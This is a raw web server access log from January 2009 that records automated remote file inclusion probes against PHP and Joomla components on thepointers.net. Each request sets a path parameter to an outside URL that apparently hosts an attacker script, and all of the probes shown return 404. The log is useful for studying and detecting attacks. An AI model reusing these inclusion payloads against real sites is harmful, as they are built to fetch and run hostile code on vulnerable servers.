83.222.23.200 - - [06/Jan/2009:06:22:12 -0800] "GET /appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:06:23:12 -0800] "GET /index.php?option=com_akocomment&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:24:08 -0800] "GET /logs/access_080930.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:24:40 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:24:40 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:24:40 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "thepointers.net"
151.1.142.10 - - [06/Jan/2009:06:28:02 -0800] "GET /index.php?redir=http://www.grasso59.altervista.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.thepointers.net"
77.221.130.2 - - [06/Jan/2009:06:28:03 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
77.221.130.2 - - [06/Jan/2009:06:28:03 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
66.172.9.3 - - [06/Jan/2009:06:29:52 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:31:30 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:06:32:41 -0800] "GET /logs/access_081016.log/index.php?option=com_akocomment&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:06:32:42 -0800] "GET /index.php?option=com_akocomment&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:06:32:42 -0800] "GET /logs/index.php?option=com_akocomment&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:06:39:13 -0800] "GET /logs/access_081010.log/errors.php?error=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:06:39:13 -0800] "GET /logs/access_081010.log/errors.php?error=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:06:39:13 -0800] "GET /logs/access_081010.log/errors.php?error=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:06:39:14 -0800] "GET /errors.php?error=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:06:39:14 -0800] "GET /errors.php?error=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:06:39:14 -0800] "GET /errors.php?error=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:06:39:14 -0800] "GET /logs/errors.php?error=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:06:39:14 -0800] "GET /logs/errors.php?error=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/200